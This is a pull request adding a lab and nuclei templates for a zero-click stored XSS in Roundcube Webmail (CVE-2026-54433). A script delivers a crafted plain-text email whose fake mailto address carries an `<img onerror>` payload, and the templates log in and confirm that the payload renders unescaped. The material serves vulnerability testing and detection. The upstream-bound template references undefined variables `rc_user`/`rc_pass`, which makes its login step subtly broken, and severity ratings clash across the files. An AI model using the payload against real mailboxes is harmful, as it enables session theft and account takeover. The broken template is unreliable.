### PR TITLE
Add vt-2026-54433 Roundcube plain-text zero-click stored XSS 

### DIFF
--- a/cves/vt-2026-54433/docker-compose.yaml
+++ b/cves/vt-2026-54433/docker-compose.yaml
@@ -1,0 +1,101 @@
+# =============================================================================
+# vt-2026-54433 — Roundcube Webmail zero-click stored XSS in plain-text
+# rendering via crafted mailto-like address (CVE-2026-54433)
+# =============================================================================
+# Real, unmodified Roundcube 1.7.1 (last vulnerable 1.7.x release), pinned
+# and mirrored to ghcr.io/happyhackingspace/vt-2026-54433 for reproducible
+# pulls, backed by a disposable SQLite DB and a disposable auth-disabled
+# GreenMail mail server (SMTP+IMAP) so the lab needs no manual provisioning.
+# An init container SMTP-delivers one crafted plain-text email to the
+# victim mailbox — the exact regression-test payload from Roundcube's own
+# fix commit (4c278f4868c67b163567cae3d74e58d872913459). Local lab only —
+# do not expose publicly.
+# =============================================================================
+
+services:
+  mail:
+    image: greenmail/standalone:2.1.3
+    container_name: vt-2026-54433-mail
+    restart: unless-stopped
+    environment:
+      GREENMAIL_OPTS: "-Dgreenmail.setup.test.smtp -Dgreenmail.setup.test.imap -Dgreenmail.hostname=0.0.0.0 -Dgreenmail.auth.disabled -Dgreenmail.verbose"
+    networks:
+      - vt-net
+
+  roundcube:
+    image: ghcr.io/happyhackingspace/vt-2026-54433:latest
+    pull_policy: always
+    container_name: vt-2026-54433-web
+    restart: unless-stopped
+    depends_on:
+      - mail
+    environment:
+      ROUNDCUBEMAIL_DB_TYPE: sqlite
+      ROUNDCUBEMAIL_DEFAULT_HOST: mail
+      ROUNDCUBEMAIL_DEFAULT_PORT: "3143"
+      ROUNDCUBEMAIL_SMTP_SERVER: mail
+      ROUNDCUBEMAIL_SMTP_PORT: "3025"
+      ROUNDCUBEMAIL_SKIN: elastic
+    ports:
+      - "8543:80"
+    healthcheck:
+      test: ["CMD", "curl", "-fsS", "http://127.0.0.1/"]
+      interval: 5s
+      timeout: 5s
+      retries: 30
+      start_period: 15s
+    networks:
+      - vt-net
+    labels:
+      - "vuln.cve=CVE-2026-54433"
+      - "vuln.product=roundcube"
+      - "vuln.severity=high"
+      - "org.opencontainers.image.source=https://github.com/HappyHackingSpace/vt-templates"
+      - "org.opencontainers.image.title=vt-2026-54433"
+
+  # One-shot: SMTP-deliver the crafted plain-text message to the victim
+  # mailbox (victim@lab.local), simulating an attacker sending mail in.
+  mail-init:
+    image: python:3.12-slim
+    container_name: vt-2026-54433-mail-init
+    depends_on:
+      - mail
+    entrypoint: ["python3", "-c"]
+    command:
+      - |
+        import smtplib, socket, time
+        from email.mime.text import MIMEText
+
+        for _ in range(60):
+            try:
+                socket.create_connection(("mail", 3025), timeout=2).close()
+                break
+            except OSError:
+                time.sleep(2)
+        else:
+            raise SystemExit("mail server never came up")
+
+        body = 'a@a.co?]<img/src="x"/onerror=alert(document.domain)>'
+        msg = MIMEText(body, "plain")
+        msg["Subject"] = "Invoice"
+        msg["From"] = "attacker@evil.example"
+        msg["To"] = "victim@lab.local"
+
+        for _ in range(30):
+            try:
+                with smtplib.SMTP("mail", 3025, timeout=5) as s:
+                    s.sendmail("attacker@evil.example", ["victim@lab.local"], msg.as_string())
+                print("DELIVERED")
+                break
+            except Exception as e:
+                print("retry:", e)
+                time.sleep(2)
+        else:
+            raise SystemExit("delivery failed")
+    networks:
+      - vt-net
+    restart: "no"
+
+networks:
+  vt-net:
+    driver: bridge

--- a/cves/vt-2026-54433/index.yaml
+++ b/cves/vt-2026-54433/index.yaml
@@ -1,0 +1,116 @@
+id: vt-2026-54433
+
+info:
+  name: "Roundcube Webmail - Zero-Click Stored XSS in Plain-Text Rendering"
+  author: omarkurt
+  description: |
+    Roundcube Webmail before 1.6.17 and 1.7.x before 1.7.2 contains a
+    zero-click stored Cross-Site Scripting vulnerability in its plain-text
+    message renderer. When converting a plain-text body to HTML,
+    rcube_string_replacer auto-links bare email addresses and permits an
+    optional mailto-style query string via the regex `(\?\S+)?`, which
+    accepts any non-whitespace character including `<` and `>`. An attacker
+    can craft a plain-text email whose "address" is
+    `a@a.co?]<img/src="x"/onerror=alert(document.domain)>`, causing the
+    trailing HTML to be emitted unescaped as soon as the victim opens or
+    previews the message - no click, download, or further interaction is
+    needed.
+  type: CVE
+  targets:
+    - roundcube-webmail
+  cve: CVE-2026-54433
+  cwe: CWE-79
+  cvss:
+    score: 10.0
+    severity: critical
+    metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N"
+  affected_versions:
+    - "Roundcube Webmail 1.6.0 - 1.6.16"
+    - "Roundcube Webmail 1.7.0 - 1.7.1"
+  fixed_version: "1.6.17 / 1.7.2"
+  tags:
+    - xss
+    - zero-click
+    - stored-xss
+    - unauthenticated
+    - webmail
+    - roundcube
+    - cwe-79
+    - cve-2026
+    - cve-2026-54433
+  references:
+    - https://roundcube.net/news/2026/07/05/security-updates-1.6.17-and-1.7.2
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-54433
+    - https://github.com/roundcube/roundcubemail/commit/4c278f4868c67b163567cae3d74e58d872913459
+    - https://vulnerabletarget.com/VT-2026-54433
+
+vulnerabilities:
+  - id: plaintext_mailto_zeroclick_xss
+    name: "Zero-click stored XSS via crafted mailto-like address in plain-text body"
+    description: |
+      An authenticated victim (victim@lab.local) has received a plain-text
+      email whose body is a single crafted pseudo mailto address:
+      `a@a.co?]<img/src="x"/onerror=alert(document.domain)>`. Simply opening
+      the message (GET /?_task=mail&_action=show) renders the trailing
+      `<img ... onerror=...>` tag unescaped inside the message body,
+      executing arbitrary JavaScript in the victim's session with no
+      further interaction.
+    endpoint: /?_task=mail&_action=show
+    method: GET
+    param: _uid
+    request: |
+      GET /?_task=mail&_action=show&_mbox=INBOX&_uid=1&_extwin=1 HTTP/1.1
+      Host: {{Hostname}}
+      Cookie: roundcube_sessid=<authenticated-session>
+    response: |
+      HTTP/1.1 200 OK
+      Content-Type: text/html; charset=UTF-8
+
+      ...<div class="pre"><a href="mailto:a@a.co?" onclick="return rcmail.command('compose','a@a.co?',this)">a@a.co?</a>]<img/src="x"/onerror=alert(document.domain)></div>...
+
+technical: |
+  rcube_string_replacer (program/lib/Roundcube/rcube_string_replacer.php) is
+  used to convert plain-text message parts to safe HTML. It matches bare
+  email addresses with a pattern that additionally captures an optional
+  mailto-style query string using `(\?\S+)?` — intended to preserve
+  legitimate strings like "user@example.com?subject=test" — but `\S+`
+  matches any non-whitespace byte, including `<` and `>`. The matched
+  address (including the malformed query fragment) is placed directly
+  inside an `<a href="mailto:...">` anchor that the replacer builds and
+  re-inserts into the HTML output *after* the surrounding text has already
+  been HTML-escaped, so the injected `<img ...>` tag is never escaped. The
+  regression test added in the fix (tests/Framework/Text2HtmlTest.php)
+  uses the exact payload `a@a.co?]<img/src="x"/onerror=alert(document.domain)>`
+  and asserts the tag is now emitted as
+  `]&lt;img/src=&quot;x&quot;/onerror=alert(document.domain)&gt;`. Fixed by
+  narrowing the pattern to `(\?[^<>\s]+)?`, which still allows normal query
+  strings but rejects angle brackets and whitespace.
+impact: |
+  Any party able to deliver a single plain-text email to the victim's
+  mailbox (no spoofing or spam-filter bypass required beyond normal mail
+  delivery) achieves arbitrary JavaScript execution in the victim's
+  Roundcube session the moment the message is opened or previewed. This
+  enables session/cookie theft, silent mailbox exfiltration, further
+  phishing from the compromised account, and full account takeover -
+  without the victim clicking any link, opening any attachment, or taking
+  any action beyond reading their inbox.
+
+remediation:
+  - "Upgrade Roundcube Webmail to 1.6.17 or 1.7.2 or later"
+  - "Until upgraded, disable plain-text-to-HTML auto-linking or restrict inbound mail to trusted senders as a stopgap"
+  - "Review Roundcube access/audit logs for anomalous outbound requests immediately following message opens, which may indicate exploitation"
+
+poc:
+  nuclei:
+    - "vt-2026-54433.nuclei.yaml"
+
+providers:
+  docker-compose:
+    path: "docker-compose.yaml"
+
+post-install:
+  - "docker compose up -d  # pulls ghcr.io/happyhackingspace/vt-2026-54433:latest"
+  - "Web UI: http://localhost:8543 (login victim@lab.local / anything - IMAP auth is disabled in this lab)"
+  - "The mail-init container auto-delivers the crafted message to victim@lab.local on startup"
+  - "Open the 'Invoice' message in the inbox to trigger the zero-click XSS (alert(document.domain) fires immediately)"
+  - "nuclei -t vt-2026-54433.nuclei.yaml -u http://localhost:8543"

--- a/cves/vt-2026-54433/vt-2026-54433.nuclei.yaml
+++ b/cves/vt-2026-54433/vt-2026-54433.nuclei.yaml
@@ -1,0 +1,105 @@
+id: vt-2026-54433
+
+info:
+  name: Roundcube Webmail - Zero-Click Stored XSS in Plain-Text Rendering (CVE-2026-54433)
+  author: omarkurt
+  severity: critical
+  description: |
+    Roundcube Webmail before 1.6.17 and 1.7.x before 1.7.2 renders plain-text
+    message bodies by first auto-linking bare email addresses found in the
+    text, then HTML-escaping the remainder. The regex used to capture an
+    optional mailto query string after the address (`(\?\S+)?`) allows any
+    non-whitespace character, including `<` and `>`, so an attacker-crafted
+    address such as `a@a.co?]<img/src="x"/onerror=alert(document.domain)>`
+    causes the trailing HTML tag to be emitted as part of the already-built
+    `<a href="mailto:...">` fragment instead of being escaped. The payload
+    executes the instant the victim opens or previews the message in
+    plain-text mode - no click, attachment, or additional interaction is
+    required.
+  impact: |
+    An unauthenticated attacker who can deliver a single email to the victim
+    triggers arbitrary JavaScript execution in the victim's Roundcube
+    session merely by having the victim open or preview the message,
+    enabling session/cookie theft, mailbox exfiltration, and further
+    account takeover.
+  remediation: |
+    Update Roundcube Webmail to 1.6.17 or 1.7.2 or later, which restricts
+    the mailto query-string pattern to exclude `<`, `>`, and whitespace
+    (commit 4c278f4868c67b163567cae3d74e58d872913459).
+  reference:
+    - https://roundcube.net/news/2026/07/05/security-updates-1.6.17-and-1.7.2
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-54433
+    - https://github.com/roundcube/roundcubemail/commit/4c278f4868c67b163567cae3d74e58d872913459
+    - https://vulnerabletarget.com/VT-2026-54433
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10.0
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: roundcube
+    product: roundcube-webmail
+    shodan-query: title:"Roundcube Webmail"
+    fofa-query: title="Roundcube Webmail"
+  tags: cve,cve2026,roundcube,webmail,xss,zero-click,stored,unauthenticated,critical
+
+flow: |
+  http(1) && http(2) && http(3)
+
+http:
+  - raw:
+      - |
+        GET /?_task=login HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    extractors:
+      - type: regex
+        name: logintoken
+        part: body
+        regex:
+          - 'name="_token" value="([^"]+)"'
+        group: 1
+        internal: true
+
+  - raw:
+      - |
+        POST /?_task=login&_action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _token={{logintoken}}&_task=login&_action=login&_timezone=UTC&_url=&_user=victim%40lab.local&_pass=anything
+
+    cookie-reuse: true
+
+    matchers:
+      - type: status
+        status:
+          - 302
+        internal: true
+
+  - raw:
+      - |
+        GET /?_task=mail&_action=show&_mbox=INBOX&_uid=1&_extwin=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<img/src="x"/onerror=alert(document.domain)>'
+
+      - type: word
+        part: body
+        words:
+          - '&lt;img'
+        negative: true

--- a/nuclei-templates-pr/CVE-2026-54433.yaml
+++ b/nuclei-templates-pr/CVE-2026-54433.yaml
@@ -1,0 +1,111 @@
+id: CVE-2026-54433
+
+info:
+  name: Roundcube Webmail - Zero-Click Stored XSS in Plain-Text Rendering
+  author: omarkurt
+  severity: critical
+  description: |
+    Roundcube Webmail before 1.6.17 and 1.7.x before 1.7.2 renders
+    plain-text message bodies by auto-linking bare email addresses via
+    rcube_string_replacer, which permits an optional mailto-style query
+    string using the pattern `(\?\S+)?`. Because `\S+` matches any
+    non-whitespace byte (including `<` and `>`), a crafted "address" such
+    as `a@a.co?]<img/src="x"/onerror=alert(document.domain)>` causes the
+    trailing HTML tag to be emitted unescaped as part of the auto-linked
+    `<a href="mailto:...">` fragment. The payload fires the instant an
+    authenticated victim opens or previews the message in plain-text mode
+    - no click, download, or further interaction is required. Fixed by
+    commit 4c278f4868c67b163567cae3d74e58d872913459, which narrows the
+    pattern to `(\?[^<>\s]+)?`.
+  impact: |
+    Any party able to deliver a single plain-text email to the victim's
+    mailbox achieves arbitrary JavaScript execution in the victim's
+    Roundcube session the moment the message is opened or previewed -
+    enabling session/cookie theft, mailbox exfiltration, further phishing
+    from the compromised account, and full account takeover, without the
+    victim clicking any link or taking any action beyond reading their
+    inbox.
+  remediation: |
+    Update Roundcube Webmail to 1.6.17 or 1.7.2 or later.
+  reference:
+    - https://roundcube.net/news/2026/07/05/security-updates-1.6.17-and-1.7.2
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-54433
+    - https://github.com/roundcube/roundcubemail/commit/4c278f4868c67b163567cae3d74e58d872913459
+    - https://vulnerabletarget.com/VT-2026-54433
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10.0
+    cve-id: CVE-2026-54433
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: roundcube
+    product: webmail
+    shodan-query: title:"Roundcube Webmail"
+    fofa-query: title="Roundcube Webmail"
+  tags: cve,cve2026,roundcube,webmail,xss,zero-click,stored
+ 
+variables:
+  user: "victim@vt-lab.local"
+  pass: "anything"
+
+flow: |
+  http(1) && http(2) && http(3)
+
+http:
+  - raw:
+      - |
+        GET /?_task=login HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    extractors:
+      - type: regex
+        name: logintoken
+        part: body
+        regex:
+          - 'name="_token" value="([^"]+)"'
+        group: 1
+        internal: true
+
+  - raw:
+      - |
+        POST /?_task=login&_action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _token={{logintoken}}&_task=login&_action=login&_timezone=UTC&_url=&_user={{rc_user}}&_pass={{rc_pass}}
+
+    cookie-reuse: true
+
+    matchers:
+      - type: status
+        status:
+          - 302
+        internal: true
+
+  - raw:
+      - |
+        GET /?_task=mail&_action=show&_mbox=INBOX&_uid=1&_extwin=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<img/src="x"/onerror=alert(document.domain)>'
+
+      - type: word
+        part: body
+        words:
+          - '&lt;img'
+        negative: true


### PR DESCRIPTION
Real Roundcube 1.7.1 (last vulnerable 1.7.x release, mirrored to ghcr.io/happyhackingspace/vt-2026-54433) backed by a disposable GreenMail SMTP/IMAP server. An init container delivers the exact regression-test payload from the upstream fix commit (4c278f486...) to victim@lab.local; opening the message triggers alert(document.domain) with zero user interaction beyond reading the inbox. Verified end-to-end against the live lab: docker-compose, index.yaml, and matching nuclei template (also mirrored to nuclei-templates-pr/ for upstream submission) all pass vt-cli validate.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **New Features**
  - Added a complete, self-contained lab environment for CVE-2026-54433, including Roundcube Webmail and a disposable mail server.
  - Added automated setup and sample-message delivery for reproducing the vulnerability.
  - Added Nuclei templates to detect the Roundcube stored cross-site scripting vulnerability.

- **Documentation**
  - Added vulnerability details, affected and fixed versions, severity information, references, remediation guidance, and lab usage instructions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->